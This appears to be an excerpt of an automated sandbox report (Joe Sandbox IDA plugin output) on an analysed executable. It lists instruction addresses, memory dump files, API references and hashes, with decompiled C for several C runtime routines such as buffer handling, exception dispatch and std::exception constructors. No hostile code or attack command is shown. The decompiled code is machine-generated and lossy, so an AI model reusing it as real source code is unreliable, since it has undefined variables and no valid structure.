                                                                                                                                    0x0040b6af
                                                                                                                                    0x0040b6b7
                                                                                                                                    0x0040b6db
                                                                                                                                    0x0040b6dd
                                                                                                                                    0x0040b6e3
                                                                                                                                    0x0040b6e7
                                                                                                                                    0x0040b6ea
                                                                                                                                    0x0040b6f5
                                                                                                                                    0x0040b6f8
                                                                                                                                    0x0040b6ff
                                                                                                                                    0x0040b6b9
                                                                                                                                    0x0040b6b9
                                                                                                                                    0x0040b6bd
                                                                                                                                    0x00000000
                                                                                                                                    0x0040b6bf
                                                                                                                                    0x0040b6c4
                                                                                                                                    0x0040b6c4
                                                                                                                                    0x0040b6bd
                                                                                                                                    0x0040b6c9
                                                                                                                                    0x0040b6cd
                                                                                                                                    0x0040b6d2
                                                                                                                                    0x0040b6da

                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 0040B6A8
                                                                                                                                      • Part of subcall function 0040DABC: __getptd_noexit.LIBCMT ref: 0040DABF
                                                                                                                                      • Part of subcall function 0040DABC: __amsg_exit.LIBCMT ref: 0040DACC
                                                                                                                                    • __getptd.LIBCMT ref: 0040B6BF
                                                                                                                                    • __amsg_exit.LIBCMT ref: 0040B6CD
                                                                                                                                    • __lock.LIBCMT ref: 0040B6DD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3521780317-0
                                                                                                                                    • Opcode ID: 301488a0f8b694325b3216782a35f123243a911e4fee766e3c1a3a5a7ae2130e
                                                                                                                                    • Instruction ID: feb38b66079c657baaf7b807031bfc7bef3632e6d010ed8b9cb0fd37039b564d
                                                                                                                                    • Opcode Fuzzy Hash: 301488a0f8b694325b3216782a35f123243a911e4fee766e3c1a3a5a7ae2130e
                                                                                                                                    • Instruction Fuzzy Hash: 6DF04932A147008BD620FBA68402B5A72A0AF40728F154A3FA451772D2CB3DA9018ADE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E0041061F(intOrPtr _a4, signed char* _a8) {
                                                                                                                                    				signed int _v0;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed char _t32;
                                                                                                                                    				signed int _t33;
                                                                                                                                    				signed int* _t34;
                                                                                                                                    				signed int _t41;
                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                    				signed int _t47;
                                                                                                                                    				signed char _t51;
                                                                                                                                    				signed char* _t65;
                                                                                                                                    
                                                                                                                                    				if(_a4 == 0xffffffff) {
                                                                                                                                    					return _t32;
                                                                                                                                    				} else {
                                                                                                                                    					_pop(_t67);
                                                                                                                                    					_t65 = _a8;
                                                                                                                                    					if((_t65[0xc] & 0x00000040) != 0) {
                                                                                                                                    						L15:
                                                                                                                                    						_t47 = _v0;
                                                                                                                                    						if(_t47 == 0xffffffff) {
                                                                                                                                    							L27:
                                                                                                                                    							_t33 = _t32 | 0xffffffff;
                                                                                                                                    						} else {
                                                                                                                                    							_t32 = _t65[0xc];
                                                                                                                                    							if((_t32 & 0x00000001) != 0 || _t32 < 0 && (_t32 & 0x00000002) == 0) {
                                                                                                                                    								if(_t65[8] == 0) {
                                                                                                                                    									E00416D3A(_t65);
                                                                                                                                    								}
                                                                                                                                    								_t32 =  *_t65;
                                                                                                                                    								if(_t32 != _t65[8]) {
                                                                                                                                    									L24:
                                                                                                                                    									 *_t65 =  *_t65 - 1;
                                                                                                                                    									_t34 =  *_t65;
                                                                                                                                    									if((_t65[0xc] & 0x00000040) == 0) {
                                                                                                                                    										 *_t34 = _t47;
                                                                                                                                    										goto L31;
                                                                                                                                    									} else {
                                                                                                                                    										if( *_t34 == _t47) {
                                                                                                                                    											L31:
                                                                                                                                    											_t65[4] = _t65[4] + 1;
                                                                                                                                    											_t65[0xc] = _t65[0xc] & 0xffffffef | 0x00000001;
                                                                                                                                    											_t33 = _t47 & 0x000000ff;
                                                                                                                                    										} else {
                                                                                                                                    											_t32 =  &(_t34[0]);
                                                                                                                                    											 *_t65 = _t32;
                                                                                                                                    											goto L27;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									if(_t65[4] != 0) {
                                                                                                                                    										goto L27;
                                                                                                                                    									} else {
                                                                                                                                    										 *_t65 = _t32 + 1;
                                                                                                                                    										goto L24;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								goto L27;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					} else {
                                                                                                                                    						_t41 = E00416DE7(_t65);
                                                                                                                                    						if(_t41 == 0xffffffff || _t41 == 0xfffffffe) {
                                                                                                                                    							_t51 = 0x4b4270;
                                                                                                                                    						} else {
                                                                                                                                    							_t51 = ((_t41 & 0x0000001f) << 6) +  *((intOrPtr*)(0x60f7c0 + (_t41 >> 5) * 4));
                                                                                                                                    						}
                                                                                                                                    						if(( *(_t51 + 0x24) & 0x0000007f) != 0) {
                                                                                                                                    							L14:
                                                                                                                                    							_t42 = E0040B128();
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							_push(0);
                                                                                                                                    							 *_t42 = 0x16;
                                                                                                                                    							_t33 = E00409A6F(0x4b4270, 0, _t65) | 0xffffffff;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t41 == 0xffffffff || _t41 == 0xfffffffe) {
                                                                                                                                    								_t32 = 0x4b4270;
                                                                                                                                    							} else {
                                                                                                                                    								_t32 = ((_t41 & 0x0000001f) << 6) +  *((intOrPtr*)(0x60f7c0 + (_t41 >> 5) * 4));
                                                                                                                                    							}
                                                                                                                                    							if(( *(_t32 + 0x24) & 0x00000080) == 0) {
                                                                                                                                    								goto L15;
                                                                                                                                    							} else {
                                                                                                                                    								goto L14;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t33;
                                                                                                                                    				}
                                                                                                                                    			}














                                                                                                                                    0x00410628
                                                                                                                                    0x00410631
                                                                                                                                    0x0041062a
                                                                                                                                    0x0041062a
                                                                                                                                    0x004187ea
                                                                                                                                    0x004187f2
                                                                                                                                    0x0041886d
                                                                                                                                    0x0041886e
                                                                                                                                    0x00418874
                                                                                                                                    0x004188b3
                                                                                                                                    0x004188b3
                                                                                                                                    0x00418876
                                                                                                                                    0x00418876
                                                                                                                                    0x0041887b
                                                                                                                                    0x0041888a
                                                                                                                                    0x0041888d
                                                                                                                                    0x00418892
                                                                                                                                    0x00418893
                                                                                                                                    0x00418898
                                                                                                                                    0x004188a2
                                                                                                                                    0x004188a2
                                                                                                                                    0x004188a8
                                                                                                                                    0x004188aa
                                                                                                                                    0x004188bb
                                                                                                                                    0x00000000
                                                                                                                                    0x004188ac
                                                                                                                                    0x004188ae
                                                                                                                                    0x004188bd
                                                                                                                                    0x004188c0
                                                                                                                                    0x004188c9
                                                                                                                                    0x004188ce
                                                                                                                                    0x004188b0
                                                                                                                                    0x004188b0
                                                                                                                                    0x004188b1
                                                                                                                                    0x00000000
                                                                                                                                    0x004188b1
                                                                                                                                    0x004188ae
                                                                                                                                    0x0041889a
                                                                                                                                    0x0041889d
                                                                                                                                    0x00000000
                                                                                                                                    0x0041889f
                                                                                                                                    0x004188a0
                                                                                                                                    0x00000000
                                                                                                                                    0x004188a0
                                                                                                                                    0x0041889d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041887b
                                                                                                                                    0x004187f4
                                                                                                                                    0x004187f5
                                                                                                                                    0x00418803
                                                                                                                                    0x00418820
                                                                                                                                    0x0041880a
                                                                                                                                    0x00418817
                                                                                                                                    0x00418817
                                                                                                                                    0x00418826
                                                                                                                                    0x0041884e
                                                                                                                                    0x0041884e
                                                                                                                                    0x00418855
                                                                                                                                    0x00418856
                                                                                                                                    0x00418857
                                                                                                                                    0x00418858
                                                                                                                                    0x00418859
                                                                                                                                    0x0041885a
                                                                                                                                    0x00418868
                                                                                                                                    0x00418828
                                                                                                                                    0x0041882b
                                                                                                                                    0x00418846
                                                                                                                                    0x00418832
                                                                                                                                    0x0041883d
                                                                                                                                    0x0041883d
                                                                                                                                    0x0041884c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041884c
                                                                                                                                    0x00418826
                                                                                                                                    0x004188ba
                                                                                                                                    0x004188ba

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fileno__getbuf
                                                                                                                                    • String ID: pBK
                                                                                                                                    • API String ID: 2304796792-2297496797
                                                                                                                                    • Opcode ID: 0060e7bf737d1fdf15d1dc3b71855b269159eca32a10041d9f4b108ea16017b3
                                                                                                                                    • Instruction ID: c64ea4fb86c15f0f8ec22d06bd9c8abd59a99cf797f090853d826e0b2d07578e
                                                                                                                                    • Opcode Fuzzy Hash: 0060e7bf737d1fdf15d1dc3b71855b269159eca32a10041d9f4b108ea16017b3
                                                                                                                                    • Instruction Fuzzy Hash: B631B472500A408AD735AA2DD8406A677D1AFC1378BA8472FE8B9867D1CB3CD8C2C75D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E0040C8D1(void* __ebx, void* __edi, intOrPtr* __esi) {
                                                                                                                                    				intOrPtr _t17;
                                                                                                                                    				void* _t26;
                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                    				void* _t29;
                                                                                                                                    				void* _t30;
                                                                                                                                    
                                                                                                                                    				_t28 = __esi;
                                                                                                                                    				_t19 = __ebx;
                                                                                                                                    				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                                    				E004096FF(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                                                                    				 *((intOrPtr*)(E0040DABC(__ebx, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                                                                    				_t17 = E0040DABC(_t19, _t26, _t30);
                                                                                                                                    				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                                                                    				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                                                                    					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                                                                    					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                                                                    						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                                                                    							_t17 = E004096D8( *((intOrPtr*)(_t28 + 0x18)));
                                                                                                                                    							_t38 = _t17;
                                                                                                                                    							if(_t17 != 0) {
                                                                                                                                    								_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                                                    								_push(_t28);
                                                                                                                                    								return E0040C656(_t38);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t17;
                                                                                                                                    			}








                                                                                                                                    0x0040c8d1
                                                                                                                                    0x0040c8d1
                                                                                                                                    0x0040c8d4
                                                                                                                                    0x0040c8da
                                                                                                                                    0x0040c8e8
                                                                                                                                    0x0040c8ee
                                                                                                                                    0x0040c8f6
                                                                                                                                    0x0040c902
                                                                                                                                    0x0040c90a
                                                                                                                                    0x0040c912
                                                                                                                                    0x0040c926
                                                                                                                                    0x0040c931
                                                                                                                                    0x0040c937
                                                                                                                                    0x0040c939
                                                                                                                                    0x0040c93b
                                                                                                                                    0x0040c93e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c945
                                                                                                                                    0x0040c939
                                                                                                                                    0x0040c926
                                                                                                                                    0x0040c912
                                                                                                                                    0x0040c946

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004096FF: __getptd.LIBCMT ref: 00409705
                                                                                                                                      • Part of subcall function 004096FF: __getptd.LIBCMT ref: 00409715
                                                                                                                                    • __getptd.LIBCMT ref: 0040C8E0
                                                                                                                                      • Part of subcall function 0040DABC: __getptd_noexit.LIBCMT ref: 0040DABF
                                                                                                                                      • Part of subcall function 0040DABC: __amsg_exit.LIBCMT ref: 0040DACC
                                                                                                                                    • __getptd.LIBCMT ref: 0040C8EE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                    • String ID: csm
                                                                                                                                    • API String ID: 803148776-1018135373
                                                                                                                                    • Opcode ID: 9851b7d1bd978cbf4e52df438003cde80b078b8b96ae1c6a8b2eb14f3d70a828
                                                                                                                                    • Instruction ID: cda2148aaa2cd7263279d6760e233dd1768d0e0144b1e5ddd5f35cfd5693b556
                                                                                                                                    • Opcode Fuzzy Hash: 9851b7d1bd978cbf4e52df438003cde80b078b8b96ae1c6a8b2eb14f3d70a828
                                                                                                                                    • Instruction Fuzzy Hash: FB014FB4801204CACF349F69C4C4AAEB3B5AF11321F54457FE040767D1CB398985CB4D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E00407481(intOrPtr __ecx) {
                                                                                                                                    				void* __edi;
                                                                                                                                    				intOrPtr _t20;
                                                                                                                                    				void* _t22;
                                                                                                                                    
                                                                                                                                    				E004097B4(E0041C1E4, _t22);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_t16 =  *((intOrPtr*)(_t22 + 8));
                                                                                                                                    				_t20 = __ecx;
                                                                                                                                    				 *((intOrPtr*)(_t22 - 0x10)) = __ecx;
                                                                                                                                    				E00409151(__ecx,  *((intOrPtr*)(_t22 + 8)));
                                                                                                                                    				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(__ecx)) = 0x401544;
                                                                                                                                    				E00406EA9(__ecx + 0xc, _t16 + 0xc, _t16 + 0xc);
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
                                                                                                                                    				return _t20;
                                                                                                                                    			}






                                                                                                                                    0x00407486
                                                                                                                                    0x0040748b
                                                                                                                                    0x0040748e
                                                                                                                                    0x00407491
                                                                                                                                    0x00407494
                                                                                                                                    0x00407497
                                                                                                                                    0x0040749c
                                                                                                                                    0x004074a7
                                                                                                                                    0x004074ad
                                                                                                                                    0x004074b9
                                                                                                                                    0x004074c1

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00407486
                                                                                                                                    • std::exception::exception.LIBCMT ref: 00407497
                                                                                                                                      • Part of subcall function 00409151: _strlen.LIBCMT ref: 00409176
                                                                                                                                      • Part of subcall function 00409151: _malloc.LIBCMT ref: 0040917F
                                                                                                                                      • Part of subcall function 00409151: _strcpy_s.LIBCMT ref: 00409192
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog_malloc_strcpy_s_strlenstd::exception::exception
                                                                                                                                    • String ID: Ql@
                                                                                                                                    • API String ID: 2198201808-766245038
                                                                                                                                    • Opcode ID: b96122c8b7771cb65dfeff40f635cf4dc8532557ba61e8415c03b2f684cb5c90
                                                                                                                                    • Instruction ID: b3a3140be5a67fa957b37f829cd07337cce8d258b93115de34c88f55a5313be1
                                                                                                                                    • Opcode Fuzzy Hash: b96122c8b7771cb65dfeff40f635cf4dc8532557ba61e8415c03b2f684cb5c90
                                                                                                                                    • Instruction Fuzzy Hash: 56E012B6A50511EBC715AF4AD805B9EF7B8EF91718F01852FA402A3252D7B899008694
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00406F6D(intOrPtr __ecx, void* __edi, void* __eflags) {
                                                                                                                                    				intOrPtr _t17;
                                                                                                                                    				void* _t19;
                                                                                                                                    
                                                                                                                                    				E004097B4(E0041C1E4, _t19);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_t17 = __ecx;
                                                                                                                                    				 *((intOrPtr*)(_t19 - 0x10)) = __ecx;
                                                                                                                                    				E004090D0(__ecx);
                                                                                                                                    				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(__ecx)) = 0x401544;
                                                                                                                                    				E00406EA9(__ecx + 0xc, __edi,  *((intOrPtr*)(_t19 + 8)));
                                                                                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
                                                                                                                                    				return _t17;
                                                                                                                                    			}





                                                                                                                                    0x00406f72
                                                                                                                                    0x00406f77
                                                                                                                                    0x00406f79
                                                                                                                                    0x00406f7b
                                                                                                                                    0x00406f7e
                                                                                                                                    0x00406f86
                                                                                                                                    0x00406f8d
                                                                                                                                    0x00406f93
                                                                                                                                    0x00406f9e
                                                                                                                                    0x00406fa6

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: Ql@$ft@
                                                                                                                                    • API String ID: 3519838083-1636751500
                                                                                                                                    • Opcode ID: c135926b38b9f282745808ac76ba6ca4158fafb36bcbdc48dd2cf4e8afc7f650
                                                                                                                                    • Instruction ID: 1cf355f88691539a6279dbca50099e2780b3cc5cedbd26736dee230ff6405978
                                                                                                                                    • Opcode Fuzzy Hash: c135926b38b9f282745808ac76ba6ca4158fafb36bcbdc48dd2cf4e8afc7f650
                                                                                                                                    • Instruction Fuzzy Hash: B7E08671960110EFC7159F85C4017DDF7B4EB04308F00802FB402B3682CBBC5A00CB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%